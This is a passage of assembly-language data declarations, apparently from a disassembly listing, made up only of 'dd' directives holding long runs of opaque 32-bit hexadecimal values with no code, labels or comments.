		dd 86592AD0h, 8CB3A80Ah, 0A2996CC3h, 516D6625h,	87C6A561h
		dd 6D1C18C4h, 69C3E8C7h, 0C88D7813h, 0DF5C4828h, 0C06E1803h
		dd 0D1205B16h, 13F9016Dh, 2F109FEDh, 9717313Ah,	0E0F8C693h
		dd 0C231628Ch, 5EFF4B31h, 4BAB6242h, 19EE4F44h,	4F261F8Dh
		dd 0FA8B6D2h, 0D9E17F3Eh, 0F94CFA9Fh, 0F92C8742h, 0AC0C4704h
		dd 0FE2263A7h, 63303966h, 0A0C84B3Ch, 0D4013863h, 99FEF0A9h
		dd 8A236340h, 40D9A47Eh, 880C26C7h, 5152632Ch, 9A296A25h
		dd 65EBC118h, 0CCFA05FAh, 453A85CFh, 0FE51A4D5h, 59A78A40h
		dd 0AA13FD9h, 4F0C17F1h, 75E5318Ch, 316D7F00h, 9EF1EC8Ch
		dd 81F19508h, 0CC3989A6h, 91118D73h, 0B1109098h, 39CC2A0Bh
		dd 0AF44209Ah, 8864E460h, 99AE9FC5h, 0A23DED1Fh, 0F1997CF7h
		dd 32B4CD8Bh, 0FCD8A40Fh, 31E6410Fh, 13358DBCh,	8C0B2C48h
		dd 90C65745h, 925690C4h, 0DC05E9h, 7BB1FFDEh, 2DC1F446h
		dd 2E937F7Bh, 4995762Fh, 17F9160Ch, 4CC5E690h, 0B4C52A90h
		dd 2BCA8067h, 68F43528h, 78260390h, 6414B0Dh, 3FD053Ah
		dd 0B01B63D5h, 95D1C4FEh, 6D3E310h, 27688C3h, 0B4BE34F0h
		dd 5944510Bh, 0CFC3CD29h, 33FB463Bh, 0ED234729h, 0CC4542FEh
		dd 3F48D19h, 0D1D0389h,	0F765C62Ch, 0A059B311h,	68ED8299h
		dd 3D93A396h, 0A1A34FBBh, 70331B25h, 6A63B18Ah,	479534F8h
		dd 83467C23h, 0CF343628h, 61EEE8B6h, 476A76E9h,	0F60E06B3h
		dd 649A5B01h, 0F599200Ch, 17FC7E3Fh, 0CD1D8688h, 0AC693483h
		dd 6926B370h, 64C4B7F6h, 950AB025h, 5002A82Eh, 7020E2B2h
		dd 54350B2Ch, 3F166317h, 2364F5Ch, 4F59A135h, 2D2C5118h
		dd 260C7B3Bh, 728CC653h, 963CC00Ch, 0EDA3B190h,	0F3CE2D27h
		dd 76387195h, 2E6C029Dh, 8D34468Dh, 9FE869Ch, 0FCED6335h
		dd 963808D7h, 469D141Fh, 0D7686FFBh, 4C9AFB37h,	0AC54C11Ah
		dd 0C8DA3039h, 0B0BB30B2h, 44CC4684h, 0B1F35623h, 362564BAh
		dd 1A683494h, 0F13F1363h, 0FC52C13Ah, 9A379952h, 3A7D30B4h
		dd 7432080h, 0A31389AEh, 0E11A113Dh, 614A0D03h,	9521E734h
		dd 55441226h, 345C2962h, 0D18AA09h, 0FB23CD1Bh,	0C8AA2919h
		dd 5068E345h, 0BD23C60Dh, 8A188868h, 351951E6h,	58192B1Ah
		dd 4CD15EB9h, 0C7692B45h, 8B0AB30Ah, 0A2078A41h, 8C024057h
		dd 560231C6h, 0B1A6BCh,	0C4EE8D38h, 8C2AE9FAh, 0C4EE34A6h
		dd 0E1334254h, 42069A66h, 0CD91788Eh, 36467203h, 8C8B615Ah
		dd 429475C6h, 67587987h, 4F336544h, 28C3FCB0h, 0C4F9B2DEh
		dd 0B1AE484Ch, 0CD16F368h, 9A170CA3h, 868B5A9Dh, 0AE454636h
		dd 634E889Fh, 0D8CCC650h, 8192CB45h, 431CB9C1h,	96F2E000h
		dd 80052435h, 9A8E26D1h, 0FB4C3EB6h, 923EC075h,	0A859FA6Eh
		dd 0E9A91DC5h, 0DA308D2Bh, 9B1AFB7Eh, 80437451h, 0D98922AFh
		dd 2A16684Ah, 9AD05280h, 2228468Ah, 2B6295B1h, 2588A5A1h
		dd 0C9424453h, 0EF08D044h, 0C8166E48h, 6962D2C4h, 1A602515h
		dd 469C34D1h, 13688D3Ch, 31302351h, 1284264h, 20488A65h
		dd 4892239h, 2A42BA54h,	9027245Dh, 32382E1Ch, 0A89DF521h
		dd 0A254651Ah, 9D183A7h, 0A21111A9h, 4C52846Ah,	0BA25C35Eh
		dd 889D2973h, 0E426404Ah, 0E926E54Ch, 0B8CD7313h, 623FBD14h
		dd 357D51EEh, 89865813h, 0BE58D42Ch, 923E7E08h,	1431112Ch
		dd 653B2E6Dh, 0A7562047h, 25D81634h, 0A362C7D6h, 0CA85FAC4h
		dd 6981562Bh, 794FB1A3h, 226F61A1h, 1794271Eh, 98175C57h
		dd 2E4E6C3Dh, 124F8FA3h, 0ECB88D2h, 68FD1324h, 3D4C9D1h
		dd 0A424E52Ah, 9189875Dh, 396992EEh, 63612641h,	5A058D20h
		dd 8BE6D348h, 415C0CA1h
		dd 270A24A5h, 3C69AE0Dh, 88D35419h, 0E62F29A6h,	1BA20529h
		dd 9327FD69h, 129E0986h, 84A70986h, 12522391h, 11A894Eh
		dd 671A9CA8h, 76264DA4h, 0A4674242h, 1A499311h,	7AB89A43h
		dd 34889A46h, 6235A1DCh, 2934D1ECh, 0B8CD3125h,	5CDFA439h
		dd 0DA462618h, 3134E45Ah, 0BCDDCA82h, 0EBBA2A86h, 94F10452h
		dd 26694A70h, 37D53CD0h, 0DED113E9h, 3F5A14B9h,	0D235ED22h
		dd 0A4661335h, 917C29C9h, 5B2493CDh, 0A29B422h,	23F67C7Fh
		dd 6899AEB3h, 0E623C133h, 0BA23C84Ch, 39895C10h, 57FE7213h
		dd 44E49E8Fh, 133DF7AEh, 5CE22673h, 52F18A0h, 8E91B31Bh
		dd 0FB34B1F6h, 0E24D4F6Ah, 0D27F88F2h, 0B28F3489h, 3641F365h
		dd 0B8D214D2h, 9734E228h, 4681B34h, 0D36C8CD2h,	0D236E225h
		dd 9286D274h, 58D23481h, 0CD8D931Ah, 612C00B1h,	511A2364h
		dd 898C583Ah, 0CB3A4AA3h, 0D2545157h, 34958628h, 4467C512h
		dd 82ECD501h, 0CA5090C4h, 42704563h, 1C16EA80h,	0C264ADD4h
		dd 5E67326Eh, 8EEEF0AFh, 59A0D063h, 7C0801F7h, 0B5E800Bh
		dd 170B83E8h, 31F94445h, 0EFC7C504h, 99C96A06h,	0C6A11A75h
		dd 56CE1623h, 0C63B8901h, 1D63C69Dh, 0E0F76FC3h, 0CFAC4E74h
		dd 761ABE04h, 0EC7EB3F4h, 0DB086D3Eh, 30D7077Fh, 0A435137Bh
		dd 17F548D0h, 0C60E091Fh, 0A7949EA4h, 3C36BC8Dh, 844F6210h
		dd 0BA31703Fh, 0F2C6A301h, 9F15613Bh, 0E59134EDh, 37642E67h
		dd 8FD86FA4h, 0D459D378h, 867F4709h, 3CCB196Dh,	5A6018E1h
		dd 0AFC32385h, 0C8FB9F96h, 2C910772h, 0AA3F3072h, 348D76C0h
		dd 41336813h, 78424137h, 0A04CA88Dh, 4414F88Dh,	4099D226h
		dd 8826323Bh, 0A289A44Ch, 0DC955511h, 0AA899504h, 9A686091h
		dd 0D42B909Ch, 2461D3BCh, 89778D41h, 14351AA8h,	3E619C35h
		dd 124004CDh, 0E48126A2h, 9910A191h, 5A283248h,	0DD4B5938h
		dd 0B82C88B5h, 0CC491901h, 0DD26E454h, 441835EFh, 0E3EA0641h
		dd 8E376682h, 0C1DA6222h, 0E547DC83h, 14326300h, 0CE689894h
		dd 87D993EAh, 5C22A190h, 0C2236216h, 28A5FEA6h,	2818FF56h
		dd 5B2BA200h, 0ECFCB3Fh, 1A3D2FAAh, 7CB1776h, 0FA69C987h
		dd 0A6BF1968h, 0A26059BAh, 350D58BCh, 0FF3D2A8h, 28666134h
		dd 0A58913F9h, 31271284h, 9524DF65h, 0D0F2E695h, 0A5617CC4h
		dd 0F242DB66h, 58C03365h, 0B690B889h, 6D9D27E5h, 36651ACBh
		dd 222C5C45h, 34953FADh, 0CCE2D29Eh, 309AD984h,	43396641h
		dd 9A1239Ch, 0D286C0B7h, 94E7EB38h, 30A95719h, 2EE338FCh
		dd 618FF233h, 73E02436h, 21866C0Ah, 0A1B2BE0Fh,	0BF4BDC60h
		dd 0D4C48D2Bh, 0C5313B28h, 8231C667h, 0CE3DFFCAh, 0A57C344Bh
		dd 1C46A5F9h, 0D284248Dh, 65618C27h, 9571C962h,	6A023240h
		dd 90244C7Dh, 407D4492h, 2CAA5D55h, 2A7FA50Bh, 0C7E9D25Ch
		dd 0C6DF4A14h, 1CA52EADh, 9CC61A2Eh, 2608C596h,	2F896E11h
		dd 3534D386h, 54A6A14Eh, 8414A289h, 42175AD2h, 5204C84Fh
		dd 9A84CEDAh, 7D2E8927h, 97ACCD62h, 0AC478B22h,	7653E23Dh
		dd 0AD1D6536h, 14C9246Dh, 5D454DBBh, 94CD25Dh, 1B87D184h
		dd 0DB14A8D2h, 0AE4D966Ah, 0F2B0CB6Dh, 0E0436E75h, 37AC9571h
		dd 8B74B12Fh, 4AB8F36Ch, 14AC6958h, 4A5094A1h, 1978255Ch
		dd 3489879h, 0F8DA39CAh, 321D5B92h, 0EA423511h,	12F72C4Fh
		dd 2A693511h, 88D5D169h, 827D0B23h, 2699446Ah, 8C25304Ch
		dd 2709284Ch, 8C252C47h, 0AD824712h, 0CB0E3C73h, 1A2A3492h
		dd 9012D27Eh, 68D2D206h, 6C774FEBh, 0A9CF5953h,	8228B9A4h
		dd 211FF5C9h, 4038140Dh, 15E509BAh, 8D1FE13Ah, 0CA5139FFh
		dd 8A5D57F8h, 3AE284A3h, 0E4A23B37h, 6714849Bh,	3008BE9Ah
		dd 118CBA75h, 6509B6DFh, 194F7B3Fh, 858392BBh, 0A78FCB8Fh
		dd 7E92B94Bh, 1335A3DBh, 6F3D3F6Ah, 0DF328F01h,	0A6A1F533h
		dd 99F02974h, 0A84C3358h, 2F2229Dh, 0D283D626h,	0A34EDA24h
		dd 636B7D08h, 0C6941372h, 7C4F7A51h, 34F11A21h,	217AEA02h
		dd 0E92D12FDh, 6A425171h, 4C9E1A50h, 8BD7D38h, 0D189267Ch
		dd 439E28E6h, 5D3EC669h, 34A19476h, 268A948Eh, 6EC5E4AAh
		dd 0D462B461h, 8133A553h, 448C48A4h, 2CA2234Ch,	28DF2842h
		dd 0DD8F953Dh, 0BD282C0Ah, 4CC41AB5h, 5090F9E5h, 0A6452613h
		dd 0C478F265h, 8BE52FF2h, 73D49ADDh, 94226133h,	0E75B52E1h
		dd 0AB089265h, 1F4FB15Dh, 6EA295C9h, 8F8F248Ah,	0A846EA10h
		dd 0CB60328h, 0D23278A9h, 0C2694338h, 53009804h, 33F09F84h
		dd 8DCF984Dh, 550B45E9h, 4897E114h, 0DA80EC53h,	4CFC0917h
		dd 0BF849944h, 96561145h, 96605354h, 9E21517Ch,	9C34536Ch
		dd 0AD4F3DBEh, 5A4F5307h, 9F4BBD6Ah, 0A6B1CA12h, 52F03E69h
		dd 8CA1649Fh, 0B0E999BCh, 0ED6F7C44h, 927ED3F2h, 9BCA0D65h
		dd 43E3BE22h, 8A85D284h, 9561C15Bh, 84040ED8h, 0B1091D95h
		dd 21106921h, 42668693h, 10F514ECh, 31153132h, 0E53402F4h
		dd 917D69AFh, 94C48AC2h, 390CA909h, 5DA1C842h, 5DC94D5Ah
		dd 0BD0445F2h, 0C2D14DB2h, 44FBF6FBh, 0C04C4C29h, 0D379D699h
		dd 83DBE227h, 45918229h, 22D23DCh, 0A96CA7CCh, 824DBEB0h
		dd 234B6284h, 380AEEEBh, 5591B601h, 0DAD72312h,	0C783A737h
		dd 0C5E8477h, 4F6D9715h, 2C90C4ABh, 2BE290D6h, 52F075E1h
		dd 29035204h, 0C49195F1h, 4ED3D40Bh, 311D569Ch,	0B45D48BDh
		dd 9544CC21h, 3849AA09h, 878DC902h, 8C351F69h, 11C41D49h
		dd 0D4511DB3h, 0ED3E7EFCh, 6C134C44h, 0F4E6FBA6h, 617F3689h
		dd 0D1A4EC8Ah, 422D88F6h, 0A98E67ECh, 0CD39C0D3h, 0F988E348h
		dd 8D5DEA2h, 67B84E0Fh,	0DBC0ADA4h, 0A8701F3Fh,	5C2C5ABCh
		dd 0B450B989h, 2671B21h, 608A9AEEh, 38891132h, 0C7A97013h
		dd 71159304h, 453C3A68h, 11DC49D6h, 51768CE9h, 95C4C3D2h
		dd 0B3B5AC23h, 4B79C982h, 0F5DA9137h, 45539EA4h, 4556677Bh
		dd 74138595h, 4479F5A6h, 22983A8Dh, 3DD43BFFh, 7CBC8C22h
		dd 0E58A5958h, 50492670h, 0ACAC6253h, 844B3C9Fh, 0B9EA2ED7h
		dd 76F6E48Fh, 9E0F4538h, 45DC9F1Fh, 62AC7654h, 234FC4AEh
		dd 4CDAB987h, 114D8DB0h, 0D1322650h, 1AF58266h,	69EC80F5h
		dd 8E481115h, 0C4F13D34h, 0B02611DCh, 28085176h, 7FCE5913h
		dd 15F3E174h, 3CFC27C9h, 0F4DAF8A6h, 711CB2CDh,	3208B29Ah
		dd 4B97EB5h, 0CB61B717h, 0A7E52562h, 0C1DC6B89h, 0D944FFB6h
		dd 0CC7AE3F5h, 78387B8Bh, 77659974h, 9576E543h,	0A93BE545h
		dd 54475027h, 9504A899h, 0C71A3A09h, 0F5251B4h,	457A61AAh
		dd 4D236D54h, 77317F6Ch, 5DADD7D4h, 0C4CA9224h,	544D0996h
		dd 18458239h, 3E455A71h, 2D3ED271h, 11D3ECFDh, 4FBDEC78h
		dd 6FCD1F6Eh, 4E366A66h, 0E5BC2DAAh, 826789A1h,	85D11D4Bh
		dd 684F1FB4h, 0C03512DBh, 7AE8CC14h, 8DBC96F0h,	8A878A17h
		dd 846E24ABh, 5F2F479Ch, 187C6285h, 42AD70EEh, 869305D9h
		dd 53EF3209h, 56A02C0Fh, 49075911h, 0CC75EE93h,	6B822D1Dh
		dd 32C0C117h, 11F665D1h, 917C8E59h, 94B89D58h, 0D1659D62h
		dd 39176693h, 1EA2D534h, 1E2DA9FDh, 0C43C7AAh, 0A1CB02ECh
		dd 349DD4FCh, 0E2513190h, 3407991Dh, 0E3C485F4h, 0D54AAA74h
		dd 0FC10A7Fh, 6EDA3E3Fh, 0A09F42BBh, 4622F0BEh,	1CAF392Dh
		dd 10400033h, 2647C46Ah, 8C3C55B8h, 0E0580C1Fh,	40785FD5h
		dd 55D43804h, 101E5122h, 98560A81h, 86CB4A12h, 60E2E234h
		dd 0E935202h, 9C288CBCh
		dd 5D004028h, 10A0CCA3h, 23281C4Fh, 24912461h, 0A6605110h
		dd 9E238028h, 951C788Ch, 0AB83A633h, 0EAD85C2Eh, 4B87F0DFh
		dd 5764DB8Bh, 5D2ABA07h, 9F32FE86h, 134B07AAh, 0F983B8BAh
		dd 4C63C52Bh, 73CF53Eh,	0CE47FF75h, 6B8CE07h, 0A03AFE01h
		dd 0F1E06A4h, 0EABF4616h, 3CA89E69h, 93C24817h,	9E29C480h
		dd 0A19F0C7Eh, 0F6C44B07h, 0DEA0A30Bh, 0C0FEC089h, 0F070975Dh
		dd 3A9CC30Ah, 68477E08h, 58ED4C6Bh, 7580516Bh, 2B2D3784h
		dd 1DD33A08h, 67BC0179h, 85ECA750h, 0AFFF2B54h,	0B8F63D10h
		dd 0FF36AB9h, 82E9036Eh, 0D2606FC4h, 5CE254AEh,	0ED6234BCh
		dd 51C9C72h, 54C7400Ch,	3F07C4E5h, 334E8B85h, 0BE9C482h
		dd 0A8757AE1h, 0B97C141Fh, 5F2ACE4Dh, 8CE2A9h, 80C307C9h
		dd 22FD6886h, 71E037C4h, 468225A5h, 7A25C1E7h, 92E6223Ah
		dd 4B654D8Dh, 0C3F4C4C9h, 0A4BAD881h, 2B059D62h, 8A78467Fh
		dd 0B714C865h, 0B812045Bh, 0D4F1AF4Eh, 193415FAh, 17623935h
		dd 0E2F9D9A2h, 5023198Bh, 0DB178AA8h, 0F45F0FA7h, 3ACCCEFBh
		dd 389D70B0h, 0A2B1674Dh, 10023674h, 82554620h,	11041DEEh
		dd 0F8CC0BDBh, 0EA058760h, 5FAF509Fh, 0D1B7CBA5h, 0C91575Fh
		dd 621C51DDh, 0A315EB06h, 25457651h, 41AE6ABBh,	7E9CFD5Fh
		dd 888BFC28h, 4CA49809h, 77881475h, 0CF86EFA3h,	0B9B15CA0h
		dd 0CA09F1CDh, 1844D250h, 0D52B254Eh, 0B35EEFBDh, 156AA4ABh
		dd 588640EAh, 0C97193B2h, 0A829BEEEh, 0AB512BF7h, 0F1E81182h
		dd 0CA116095h, 19E98FD6h, 2F46DF3Bh, 0EC229352h, 0F1A67756h
		dd 4ACE72D0h, 2C40DD84h, 6775BD1Dh, 8B0A19D9h, 0B8E2AB48h
		dd 0A4A3E330h, 2283F32Dh, 7B205DD3h, 0AAB11391h, 11473012h
		dd 57063846h, 0B32A6722h, 15B6C8C3h, 19AAE2EAh,	36025EBEh
		dd 7E20A88Dh, 0D216FB30h, 0D010ABDh, 897ABA8Ah,	0A390E4C6h
		dd 87FCE0D8h, 4596FC07h, 0B28C576Fh, 313B62EBh,	0CF006D4Eh
		dd 0F473E85Dh, 8171EE24h, 323E01C9h, 9B17A8B3h,	60F8B88Dh
		dd 46F5596h, 0F0FF1E8Ch, 217BFBBh, 86204136h, 0D8971C2Ah
		dd 3F8B382Ch, 0CC05D242h, 5F01BA0Ah, 47319285h,	6DD639DBh
		dd 557D7F8Ch, 332418D0h, 0A4618E14h, 0EE62AB87h, 4AB95F64h
		dd 0E4C1A12Dh, 0C4C286CFh, 0F1A84A1Fh, 49395DE4h, 0ACE10F92h
		dd 0B9F2068Bh, 0AE07552Fh, 7492CF18h, 0C92CD2B3h, 0EA70BBCCh
		dd 907B95F7h, 0E41D3FF0h, 7F632302h, 0FAD03081h, 87EC7ECCh
		dd 616C9615h, 66642025h, 9D511C25h, 0D905FA01h,	59F957DAh
		dd 0F35C82A0h, 741D5767h, 64399F95h, 7CD2C822h,	0AAC288A4h
		dd 39565264h, 59F89D45h, 6FE676CBh, 2D5014A5h, 84881244h
		dd 86BD15D5h, 0B301284Bh, 15C379F5h, 3663836Bh,	1BA1F5F2h
		dd 5A89F1EFh, 865AAA55h, 759502E5h, 9491588Dh, 25152AA6h
		dd 40FE4772h, 0E8C25B53h, 8C2A3AC0h, 301B6631h,	602BF3DCh
		dd 0DEBF0124h, 31A7A28Eh, 0DA8A313Eh, 0F8C3ACBFh, 607831A2h
		dd 62E86A11h, 916C62E7h, 4513CFD5h, 9A2FFA2h, 87A2452Bh
		dd 7EE8C95Eh, 75C2EBEEh, 12516713h, 0A6010178h,	0C817188h
		dd 7DE01857h, 86036621h, 18085E62h, 0AA6CD62Eh,	90F91814h
		dd 3D50500h, 0AB039F19h, 6502002Fh, 9D3B7B1Bh, 3182A0BBh
		dd 0C11F0486h, 701BE636h, 92EB5437h, 8C0A9AFBh,	938F5D71h
		dd 153622FBh, 85205770h, 0D6A312E9h, 88313C57h,	9988C552h
		dd 0C45A0C91h, 88AB92FBh, 4452E2FAh, 0A7F2957Ch, 5A3460BAh
		dd 7F8031BAh, 6E981125h, 8D015896h, 9C5F132Fh, 119D2C06h
		dd 0DEA33B15h, 85414417h, 2A01D2A2h, 0E9112A09h, 774124FAh
		dd 0CD77AB08h, 43992105h, 8CA19D51h, 20A304Ah, 0D5918CFCh
		dd 0D658980Dh, 0C198B178h, 0D658D17Dh, 0E7667E6Bh, 22AC1F99h
		dd 0BEE06388h, 0EF713768h, 9267CC8Bh, 387307F4h, 0A465F0CAh
		dd 9C49F6C0h, 9C651E3Ch, 599E1E30h, 0ED453993h,	0B7015CC6h
		dd 0BEE70996h, 64931BF6h, 22A2B2B5h, 0B7EE106Ch, 66CC8CBEh
		dd 82318AB0h, 270B0A56h, 942B3A10h, 2E7FAAFAh, 3F7601BBh
		dd 55F1318Ch, 3D07C031h, 1211AAB2h, 3E9F7F5h, 90431366h
		dd 2FE89E34h, 7A69308Ch, 330E0B45h, 8774E020h, 68C2F4EFh
		dd 226C32C1h, 5762A34Eh, 81C3C8B9h, 0C07A31Ah, 36FEEC15h
		dd 0B45877E9h, 8D2DA6DFh, 5A214927h, 0D6613A5h,	49A55B3Dh
		dd 426ECF20h, 17DE597Dh, 48B566BFh, 11522EA3h, 215615D5h
		dd 0F0D810C3h, 0C23844ACh, 1A00D05h, 3830BFA5h,	78BE2D30h
		dd 0C70E3382h, 0AAC29678h, 4BA2139Bh, 19529A3Fh, 0E8F3A89Bh
		dd 32088AE7h, 0A75312A4h, 0FE179A2Eh, 488619C2h, 0FB76F47Bh
		dd 9F44FCB3h, 5EABE808h, 0B9F29A59h, 63F1A2F2h,	5A0D97D8h
		dd 1C41626Eh, 50E3457Dh, 0CD514076h, 3CCFE55Ah,	0A3628D36h
		dd 7F11EBCAh, 0BC7AD566h, 4E5584D1h, 0DAB1B177h, 8D35A7DCh
		dd 0CDED198Ch, 296FA3E0h, 81345769h, 0A415EA24h, 0A8CA134Ch
		dd 93F08AEEh, 98212B2Ch, 664A4057h, 0C7B3665Eh,	5C323B16h
		dd 0F7D12FA7h, 90AF5DD5h, 7038F8DAh, 2A88398Fh,	0B36AC60Ah
		dd 721559C1h, 1229F54Ch, 9E279DF6h, 0C7414203h,	6904CF4Ah
		dd 0D1C9B8A8h, 3BB543D0h, 46E0E391h, 79034D09h,	0F837A557h
		dd 7E43E54Eh, 8AA22821h, 3C75ECAAh, 34D16156h, 357695F5h
		dd 7A89FA4Ch, 45538DE0h, 0AC3305AAh, 9CD7D52Fh,	0F42A6431h
		dd 6462267Fh, 6304F888h, 5F73D504h, 787D3FC0h, 43749397h
		dd 34682D07h, 5A553558h, 2E43A343h, 0B3C1C2F0h,	4F9A7431h
		dd 2AF787C8h, 55024AF0h, 0D060E65Bh, 822E32D1h,	0FA1FADE8h
		dd 76FD6EA3h, 0E008E1B7h, 8BE4286Fh, 0F9856FF2h, 350A1707h
		dd 76135CE4h, 39EB887Eh, 3791E8C2h, 948F84h, 0FD883706h
		dd 0E98B1230h, 0E2EC1399h, 0C2D5A217h, 0BE8496A7h, 0DF5131ACh
		dd 4632190Fh, 1F4A22BCh, 5B8FAF83h, 829DD784h, 0DAF94662h
		dd 0CFC3CD43h, 0CCF4C30Ah, 362B195Fh, 10A5E034h, 8BA0A492h
		dd 0EEB1BC96h, 6D9E7AFFh, 4575C99Fh, 0AFF0D3F0h, 0E588C456h
		dd 7806FD73h, 2769B2D1h, 7DDADAB6h, 74D985F0h, 0BA235E6Ah
		dd 45145D3Bh, 811168BEh, 0E3F194D9h, 6001FF06h,	1EEE01B4h
		dd 8AB156A6h, 46E9BDD0h, 8DA8D803h, 0F8F0FE1Eh,	75247F60h
		dd 3A81535Dh, 4A826203h, 18B925C0h, 50BF8509h, 8BE32040h
		dd 0FB8FDA1Bh, 15D98562h, 8EB95B4Bh, 0A92D3B3Fh, 48711C05h
		dd 17C83017h, 930C9CA6h, 27628B8h, 0CF414BB5h, 9AAB3697h
		dd 444EA395h, 8BA45B00h, 71502BBFh, 17A10C08h, 447D69D4h
		dd 17F47162h, 5FF3C511h, 0C957C8DEh, 1C02162Ah,	0D30DB3FAh
		dd 7BFA9A8h, 915DDDF0h,	49306AA5h, 67365F5Bh, 313BBFF0h
		dd 0F8BFBB8Bh, 59BAFDAFh, 0D232A1A5h, 4ABB304Fh, 0DAE61B60h
		dd 0C416AFF8h, 0FECD3588h, 74890862h, 0BE02AAB9h, 0E4E36Fh
		dd 0BF728EAAh, 0C630DADCh, 0E64D09EBh, 372A9BD4h, 2355080Eh
		dd 28B32955h, 0ADF85FE5h, 9556EDC9h, 146158EAh,	0EDC496AEh
		dd 15054CEh, 3BF6E21Fh,	0FC3F3BA7h, 6F94EE54h, 0D21C8F8Ah
		dd 0F92E3618h, 0C5FCFC7h, 50C4AFE9h, 83E6A7h, 0F53FEF7Ah
		dd 8A4388CEh, 3F8A4A19h, 0A4A1A05h, 1B35688h, 0E168568Ah
		dd 3A8562B5h, 4C0E294Eh, 3145B00Bh, 2ABB1682h, 7608F713h
		dd 5E83F2Eh, 53CC7584h,	0B4C7C2D2h, 7594202Ch, 1A84A026h
		dd 0C189C118h, 86A2999h, 0B1628AD1h, 0B3BF72DAh, 0D2978D2Ch
		dd 0E047345h, 793533FBh
		dd 4AFB3113h, 0BEE1EA03h, 162F843Ch, 0D68808A3h, 0F0F340F8h
		dd 959C8352h, 4FB2308Ah, 0AEDD0F19h, 115D131Bh,	1A759953h
		dd 80ABEA33h, 25337564h, 0B4D39087h, 810F5886h,	932E0167h
		dd 0B09D09A1h, 516FCA2Ch, 0C159D44h, 9582362Ch,	0D4BF93A9h
		dd 156E9C1h, 0E9A0B095h, 8897F10Dh, 0CA3DAEBFh,	3CEAF538h
		dd 6A400968h, 42E6EE5h,	7A8EFD59h, 0D62946EEh, 593F4350h
		dd 325713ADh, 34E04DEAh, 0A00A31A5h, 7734BB1Eh,	7BD61783h
		dd 0B2214531h, 15C88512h, 125FBF94h, 0E6E38E8Ah, 0C9D4D9DDh
		dd 5DBD883Ch, 9B54538Dh, 860BDCBFh, 955381Ch, 22B145FFh
		dd 6519D15Dh, 0DEE27F64h, 0D2982B4Dh, 3C88E0C5h, 0EDCABE73h
		dd 0B18BC24Ah, 0BBA35D0Ch, 0E4C0DBD9h, 6941321Ah, 0B1A15619h
		dd 921058B8h, 2FE8E186h, 0C635708Ch, 20263E91h,	98D61C88h
		dd 7B5417E4h, 286AB4F1h, 0B1A4137Fh, 3DA2C2DAh,	0EA308BEEh
		dd 20EFAB99h, 0F451D3B0h, 0B8F03774h, 9D188CC7h, 0ACAB47E1h
		dd 60F90D4h, 8DC5F19Dh,	40B6F52Eh, 462E9765h, 50262ABh
		dd 16A4128Fh, 8E31DDE3h, 765EB11Ch, 3BD75A9Eh, 237FCD62h
		dd 75534534h, 494E4463h, 51710902h, 46272AE3h, 0DDB50A78h
		dd 0ECC6E7ABh, 6174A354h, 5527667Fh, 6CF1AAADh,	0AA2F18CBh
		dd 62BC101Ch, 581FED2Eh, 0CEA1DB0Dh, 1EFC9607h,	479A9606h
		dd 45212719h, 2BFC966Bh, 899F406Fh, 0BC503429h,	0C8F295A3h
		dd 80B41B43h, 5047CF2Ah, 8C5CC205h, 5178AA88h, 1DE90BFEh
		dd 9405058Ch, 0E0784C82h, 20239559h, 4A511031h,	0B09E8850h
		dd 363916Ah, 612B5D67h,	7BB3FB40h, 1E5F888Ch, 455A142Bh
		dd 47B1D218h, 935573E6h, 0ED5B7731h, 7C68C0C5h,	59083EB0h
		dd 97F42B59h, 9C8D9D43h, 9CDC41BAh, 0B6234624h,	60611A92h
		dd 0D72C92D1h, 0B8BAFFBh, 0D2BE6160h, 1DF8222Bh, 7243136Dh
		dd 82B34A13h, 5488D84h,	29A787CAh, 844ECB6Bh, 6BA12975h
		dd 5C0218CAh, 28DB2999h, 0F689052h, 0AC58E5D2h,	8CBE2437h
		dd 0D9EB85EDh, 0D4A82C78h, 0DE6782C2h, 0FF28E61Bh, 68C6C144h
		dd 327EEA7Eh, 29B4E1F6h, 3313FD2Fh, 61B0DA83h, 946D1950h
		dd 254C65E1h, 2FAD5893h, 0F7BE3DBAh, 101C1A77h,	0F0BF7476h
		dd 0B2B85D37h, 88A3A7F8h, 0A589FFDBh, 634081A8h, 3FB5B38Fh
		dd 0F61BD3BFh, 0F82E2BBEh, 0C204FEA5h, 0CC8E54h, 0E80F109Ch
		dd 69D84E77h, 7090ABA2h, 5F8A4DB3h, 0C2573BB2h,	13814269h
		dd 0E48992C0h, 0C7179ED1h, 79B4B553h, 0FAE1444Ch, 52760187h
		dd 5992CAB4h, 0C9897D7Eh, 19A84C0h, 0D1672FF0h,	0A7A9BDA3h
		dd 71802DEEh, 0F35AB14Ch, 35908CCCh, 82DB3D91h,	5C2B2E80h
		dd 0AFCA5501h, 9CB11288h, 0E8F17DCAh, 0C6EF40D7h, 3F3DF023h
		dd 0AA884508h, 0DE408104h, 0BBAF99A4h, 1C85FFD4h, 0D804B9E7h
		dd 0F1EC3867h, 2754A64Fh, 5455AD81h, 195C70CEh,	604C7818h
		dd 64B3F25h, 0C541919Bh, 0E99753B4h, 55E0B45Bh,	0DD614312h
		dd 15117883h, 5F0AD506h, 7A8CAC53h, 1719B431h, 22CA6A1Dh
		dd 1E688EE8h, 0A4A6F13h, 0C60FD298h, 46BE36D9h,	0DC5D9A22h
		dd 511E0FF2h, 4C0608Ch,	61D0BD83h, 1A1475B2h, 95FBFDFDh
		dd 0D01FA7h, 0EA3DF126h, 1086D7Fh, 0C766B5EFh, 0D5D152CDh
		dd 33145C04h, 2B5443CBh, 0BEEA709h, 3C66431Ah, 0BA0C38A9h
		dd 0CCDF1AEh, 4B5A5B18h, 0E8D5C697h, 50589A55h,	34A3FA4Eh
		dd 4CE8BC65h, 6568A3FBh, 305E194Eh, 28E50DA6h, 576E3E8Ah
		dd 462FC6E8h, 46C73EADh, 53019927h, 4D1C408Ah, 1AEE4DE4h
		dd 0FBDD638Ch, 6E82E636h, 500553BFh, 3EA6FECBh,	5B535F44h
		dd 0C24CACC0h, 90191D8Dh, 2060E29Bh, 462470D7h,	5DC081BCh
		dd 64352C7Bh, 1132FB8h,	5E6E4C1Eh, 6A7778C4h, 754AB3CAh
		dd 1443D044h, 48ED55C8h, 6A83E9C4h, 0F1C717E9h,	164E2871h
		dd 5FA0B95h, 0F58572B9h, 5DB072Eh, 36137354h, 8829C466h
		dd 0A63AB9BBh, 6EE4519Ah, 4B315CE8h, 0F7F34A7Dh, 30AAD395h
		dd 0B1DECD34h, 0DC1D98B6h, 1E8E8043h, 9BBFCE63h, 0EE96461Bh
		dd 1A6A89A2h, 4F827244h, 0F44B5402h, 828D9245h,	0FBD5EB6Ah
		dd 67C2A1A1h, 30C3BD43h, 0B26DB383h, 0FF4C5CCAh, 0FC43226Bh
